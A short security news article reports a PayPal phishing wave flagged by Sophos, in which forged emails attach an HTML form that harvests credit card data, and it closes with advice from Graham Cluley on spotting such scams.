14 DAY TRIAL // Security researchers from Sophos warn that a new wave of PayPal phishing emails are hitting people's inboxes in an attempt to trick them into exposing their login credentials.
The emails bear a subject of "Please confirm your identity" and have forged headers to appear as originating from PayPal.
However, it appears the attackers forgot to also change the sending email address from [email protected], which suggests they previously ran a phishing campaign against Australian taxpayers.
The fake PayPal emails do not contain a link to a phishing site like most such attacks do. Instead they have an HTML document attached, which, when opened inside the browser, mimics the PayPal website and contains a form for inputting credit card data.
The email message does not stand out and uses a traditional lure. It informs recipients that unusual activity was detected on their accounts, which led to them being restricted.
They are asked to verify their identity using credit card details, so that account restrictions can be lifted. In order to make sure the form works, phishers included instructions on how to bypass the browser security mechanisms.
"When you will complete the document we have sent, remember to ALLOW javascript and ActiveX to run from the bar that will pop-up, otherwise we cannot verify the informations you have provided," they write.
"If you're ever uncertain whether a message really comes from PayPal or not, visit the real PayPal website and log in as usual. If they really have a security message for you, you'll be able to read it via the PayPal messaging system itself," advises Graham Cluley, senior technology consultant at Sophos.
In addition, the PayPal website is protected with SSL. Users are always advised to check for visual cues that indicate the connection is secure before logging into their accounts or providing any kind of information.